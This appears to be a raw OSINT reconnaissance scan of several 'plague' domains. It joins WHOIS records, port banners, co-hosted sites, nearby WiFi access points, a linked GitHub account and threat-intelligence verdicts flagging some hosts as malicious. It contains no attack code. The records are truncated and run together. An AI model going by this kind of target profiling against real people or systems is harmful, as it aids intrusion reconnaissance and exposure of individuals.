Registry Billing ID: REDACTED FOR PRIVACY Billing Name: REDACTED FOR PRIVACY Billing Organization: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing City: REDACTED FOR PRIVACY Billing State/Province: REDACTED FOR PRIVACY Billing Postal Code: REDACTED FOR PRIVACY Billing Country: REDACTED FOR PRIVACY Billing Phone: REDACTED FOR PRIVACY Billing Fax: REDACTED FOR PRIVACY Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: cleo.ns.cloudflare.com Name Server: aliza.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN RDDS Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:32.521Z <<< For more information on domain status codes, please visit https://icann.org/epp The WHOIS information provided in this page has been redacted in compliance with ICANN's Temporary Specification for gTLD Registration Data. The data in this record is provided by Uniregistry for informational purposes only, and it does not guarantee its accuracy. Uniregistry is authoritative for whois information in top-level domains it operates under contract with the Internet Corporation for Assigned Names and Numbers. Whois information from other top-level domains is provided by a third-party under license to Uniregistry. This service is intended only for query-based access. 
By using this service, you agree that you will use any data presented only for lawful purposes and that, under no circumstances will you use (a) data acquired for the purpose of allowing, enabling, or otherwise supporting the transmission by e-mail, telephone, facsimile or other communications mechanism of mass unsolicited, commercial advertising or solicitations to entities other than your existing customers; or (b) this service to enable high volume, automated, electronic processes that send queries or data to the systems of any Registrar or any Registry except as reasonably necessary to register domain names or modify existing domain name registrations. Uniregistry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. All rights reserved. Domain Name: PLAGUE.LINK Registry Domain ID: DO_00981b8bafad29479f36ae1c8b278bf9-UR Registrar WHOIS Server: whois.tucows.com Registrar URL: http://tucowsdomains.com Updated Date: 2022-04-16T21:21:55 Creation Date: 2022-04-16T15:38:41 Registrar Registration Expiration Date: 2023-04-16T15:38:41 Registrar: TUCOWS, INC. 
Registrar IANA ID: 69 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Charlestown Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: KN Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: Registrant Email: https://tieredaccess.com/contact/958dc034-9a4e-45aa-94ca-35d186511fbb Registry Admin ID: Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: Admin Email: REDACTED FOR PRIVACY Registry Tech ID: Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: Tech Email: REDACTED FOR PRIVACY Name Server: cleo.ns.cloudflare.com Name Server: aliza.ns.cloudflare.com DNSSEC: unsigned Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +1.4165350123 URL of the ICANN WHOIS Data Problem Reporting System: https://icann.org/wicf >>> Last update of WHOIS database: 2022-12-18T00:31:32Z <<< "For more information on Whois status codes, please visit https://icann.org/epp" The Data in the Tucows Registrar WHOIS database is provided to you by Tucows for 
information purposes only, and may be used to assist you in obtaining information about or related to a domain name's registration record. Tucows makes this information available "as is," and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass, unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of any Registry Operator or ICANN-Accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of Tucows. Tucows reserves the right to terminate your access to the Tucows WHOIS database in its sole discretion, including without limitation, for excessive querying of the WHOIS database or for failure to otherwise abide by this policy. Tucows reserves the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. NOTE: THE WHOIS DATABASE IS A CONTACT DATABASE ONLY. LACK OF A DOMAIN RECORD DOES NOT SIGNIFY DOMAIN AVAILABILITY. 
plague.link 2022-12-18 00:21:54 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77a7df6a3f6b13ec-ORD Content-Encoding: gzip 104.21.7.179 2022-12-18 00:12:37 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'MO', u'country_tld': u'.us', u'ip': u'34.149.204.188', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Chicago', u'city': u'Kansas City', u'network': u'34.149.0.0/16', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 39.1027, u'in_eu': False, u'utc_offset': u'-0600', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'GOOGLE', u'postal': u'64184', u'asn': u'AS15169', u'country': u'US', u'region': u'Missouri', u'longitude': -94.5778, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} 34.149.204.188 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None seguridadprovincia.postquestions1.repl.co 34.149.204.188 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None (Net ID: 00:02:2D:04:09:0C) 37.7803446,-122.3906132 2022-12-18 00:16:59 Web Content Type No Web Spider 0 0 4 0 None text/css http://webmail.zerotwo-best-waifu.online/css/qbert_theme/template/custom.css?v=1.7.0 2022-12-18 00:12:06 Country No Country Name Extractor 0 1 2 0 None Switzerland Zurich, Zurich, ZH, Switzerland, CH 2022-12-18 00:19:10 Hosting Provider No Hosting Provider Identifier 0 0 3 0 None register.it: http://we.register.it/ 81.88.58.196 2022-12-18 00:16:58 HTTP Status Code No Web Spider 0 0 4 0 None 200 
http://webmail.zerotwo-best-waifu.online/js/vendor/jquery-3.5.0.min.js 2022-12-18 00:21:06 Open TCP Port No Censys 0 0 2 0 None 172.67.147.230:2087 172.67.147.230 2022-12-18 00:08:52 Raw Data from RIRs No LeakIX 0 0 2 0 None
{"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=Yq2nlCjSy9QiY40pDUMjQsSM2qIldDxaQuSZRA9Ar8aYWRzUOQPO0TntnMuPcCLIYI5EPwrfN5jncUSDLa3g08w25W7%2FVPK8JbDFOIbB9xD8jPPsl6FIpQB57De%2BcLfefPWNgxuST%2FIy"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nStrict-Transport-Security: max-age=0; includeSubDomains\r\nServer: cloudflare\r\nCF-RAY: 7640c623bb876bab-SIN\r\nalt-svc: h3=":8443"; ma=86400, h3-29=":8443"; ma=86400\r\n\n\n', u'time': u'2022-11-02T23:50:42.241381011Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'104.21.28.240', u 104.21.28.240 2022-12-18 00:21:51 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b265899d032ad2-ORD Content-Encoding: gzip 172.67.137.37 2022-12-18 00:06:42 Open TCP Port No Pulsedive 0 0 2 0 None 172.67.190.129:80 172.67.190.129 2022-12-18 00:02:43 SSL Certificate - Issued to No CertSpotter 1 0 1 0 None CN=atlas.plague.fun plague.fun 2022-12-18 00:18:08 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.2:80 188.114.97.0/24 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None CATYLN (Net ID: 00:01:38:86:06:1F) 37.780462,-122.390564 2022-12-18 00:29:08 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.uk plague.fun 2022-12-18 00:23:31 Raw DNS Records No DNS Raw Records 0 0 2 0 None mail.zerotwo-best-waifu.online. 900 IN CNAME mail-fr.securemail.pro. 
mail.zerotwo-best-waifu.online 2022-12-18 00:06:58 Malicious IP Address Yes Internet Storm Center 0 1 2 0 None Internet Storm Center [188.114.96.1] https://isc.sans.edu/api/ip/188.114.96.1 188.114.96.1 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None vc657hg.qw653bv.repl.co 34.149.204.188 2022-12-18 00:30:51 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@godaddy.com Domain Name: plague.app Registry Domain ID: 2CB67ED35-APP Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com/ Updated Date: 2021-05-10T13:06:59Z Creation Date: 2018-05-08T16:02:12Z Registry Expiry Date: 2023-05-08T16:02:12Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Domains By Proxy, LLC Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Arizona Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Billing ID: REDACTED FOR PRIVACY Billing Name: REDACTED FOR PRIVACY Billing Organization: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing City: REDACTED FOR PRIVACY Billing State/Province: REDACTED FOR PRIVACY Billing Postal Code: REDACTED FOR PRIVACY Billing Country: REDACTED FOR PRIVACY Billing Phone: REDACTED FOR PRIVACY Billing Fax: REDACTED FOR PRIVACY Billing Email: Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Name Server: ns1.101domain.com Name Server: ns2.101domain.com Name Server: ns5.101domain.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:30:48Z <<< For more information on Whois status codes, please visit https://icann.org/epp Please query the WHOIS server of the owning registrar identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. WHOIS information is provided by Charleston Road Registry Inc. (CRR) solely for query-based, informational purposes. By querying our WHOIS database, you are agreeing to comply with these terms (https://www.registry.google/about/whois-disclaimer.html) and acknowledge that your information will be used in accordance with CRR's Privacy Policy (https://www.registry.google/about/privacy.html), so please read those documents carefully. Any information provided is "as is" without any guarantee of accuracy. You may not use such information to (a) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations; (b) enable high volume, automated, electronic processes that access the systems of CRR or any ICANN-Accredited Registrar, except as reasonably necessary to register domain names or modify existing registrations; or (c) engage in or support unlawful behavior. CRR reserves the right to restrict or deny your access to the Whois database, and may modify these terms at any time. 
Domain Name: plague.app Registry Domain ID: 2CB67ED35-APP Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2021-05-05T13:06:59Z Creation Date: 2018-05-08T16:02:12Z Registrar Registration Expiration Date: 2023-05-08T16:02:12Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: CR361583626 Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 2155 E Warner Rd Registrant City: Tempe Registrant State/Province: Arizona Registrant Postal Code: 85284 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.app Registry Admin ID: CR361583636 Admin Name: Registration Private Admin Organization: Domains By Proxy, LLC Admin Street: DomainsByProxy.com Admin Street: 2155 E Warner Rd Admin City: Tempe Admin State/Province: Arizona Admin Postal Code: 85284 Admin Country: US Admin Phone: +1.4806242599 Admin Phone Ext: Admin Fax: +1.4806242598 Admin Fax Ext: Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.app Registry Tech ID: CR361583632 Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 2155 E Warner Rd Tech City: Tempe Tech State/Province: Arizona Tech Postal Code: 85284 Tech Country: US Tech Phone: 
+1.4806242599 Tech Phone Ext: Tech Fax: +1.4806242598 Tech Fax Ext: Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.app Name Server: NS1.101DOMAIN.COM Name Server: NS2.101DOMAIN.COM Name Server: NS5.101DOMAIN.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:30:48Z <<< For more information on Whois status codes, please visit https://icann.org/epp TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice. 
2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77ad0dfe8ae622f1-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.7.179 2022-12-18 00:03:01 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.95 90.116.166.104 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None GitHub (Category: coding) https://github.com/rasputain rasputain 2022-12-18 00:17:08 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None amen.fr webmail.zerotwo-best-waifu.online 2022-12-18 00:14:47 Internet Name - Unresolved No VirusTotal 0 0 1 0 None 69-sparte.plague.fun plague.fun 2022-12-18 00:25:44 Affiliate - Domain Name No DNS Resolver 2 0 5 0 None dominiando.uk ns.dominiando.uk 2022-12-18 00:21:51 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b0cb6b7b4e2c4c-ORD Content-Encoding: gzip 172.67.137.37 2022-12-18 00:05:06 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 5, u'search_terms': [{u'id': u'host', u'value': u'20.226.83.185'}], u'result': 
[{u'environment_id': 110, u'job_id': u'638f6278389c860b621ea62a', u'analysis_start_time': u'2022-12-06 15:40:40', u'vx_family': u'Malicious site', u'av_detect': u'5', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 33, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'3f181648f1364a23b7f272f4e60c08615f1febfa72b78e3c8d75daeaaa6d3110', u'type': None, u'type_short': u'url', u'size': 49}, {u'environment_id': 110, u'job_id': u'638f600a6664a264d86af3b3', u'analysis_start_time': u'2022-12-06 15:30:19', u'vx_family': u'Malicious site', u'av_detect': u'5', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 33, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'c1c6183777a5ff13aeb0f503c548f30309a8058c37c93d6c8541614030f00fa5', u'type': None, u'type_short': u'url', u'size': 55}, {u'environment_id': 110, u'job_id': u'638f5e1253d2ec57ca1854bd', u'analysis_start_time': u'2022-12-06 15:21:55', u'vx_family': u'Malicious site', u'av_detect': u'10', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 34, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'bdd3745faefe1c8fdb922e3671a3e342360d521a0f1fa974510813c51fb1913c', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 110, u'job_id': u'638f5c1808fc134fee52854a', u'analysis_start_time': u'2022-12-06 15:13:29', u'vx_family': u'Malicious site', u'av_detect': u'8', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 63, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'52243024bb50bb158cfb524a2623013b1733c9c67fee71e88d86ac5aeae8f36b', u'type': None, u'type_short': u'url', u'size': 67}, {u'environment_id': 110, u'job_id': u'638f5a030d35cf1e924e752e', u'analysis_start_time': u'2022-12-06 15:04:36', u'vx_family': u'Malicious site', u'av_detect': u'5', u'environment_description': u'Windows 7 32 bit (HWP Support)', 
u'threat_score': 12, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'33c924af831ebf0a78a69b3c46d21ee130387cbefb922390d78c5dcf642b6f61', u'type': None, u'type_short': u'url', u'size': 65}]} 20.226.83.185 2022-12-18 00:06:00 Affiliate - Domain Name No DNS Resolver 0 0 2 0 None registrar-servers.com eforward1.registrar-servers.com 2022-12-18 00:04:50 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 1, u'search_terms': [{u'id': u'host', u'value': u'188.114.96.1'}], u'result': [{u'environment_id': 100, u'job_id': u'631a665717ba8f2f707e8915', u'analysis_start_time': u'2022-09-08 22:02:00', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'5d930bb75d728b31880a4b3fe975a343b4dfd7855f2a943ba94d6c5bb93a8cfa', u'type': None, u'type_short': u'url', u'size': 44}]} 188.114.96.1 2022-12-18 00:37:36 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.synology.me plague.fun 2022-12-18 00:32:27 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.tools Registry Domain ID: ecc23f6039fd437480662da9344894d6-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-02-13T11:50:45Z Creation Date: 2022-02-08T11:50:07Z Registry Expiry Date: 2023-02-08T11:50:07Z Registrar: NameCheap, Inc. 
Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:32:17Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. 
Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Socket not responding: timed out plague.tools 2022-12-18 00:13:45 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@namecheap.com Domain Name: plague.ca Registry Domain ID: 73359129-CIRA Registrar WHOIS Server: whois.ca.fury.ca Registrar URL: https://www.namecheap.com/ Updated Date: 2022-03-24T03:14:22Z Creation Date: 2019-01-18T19:17:36Z Registry Expiry Date: 2023-01-18T19:17:36Z Registrar: Go Get Canada Domain Registrar Ltd. 
Registrar IANA ID: not applicable Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: REDACTED FOR PRIVACY Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: REDACTED FOR PRIVACY Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please ask the Registrar of Record 
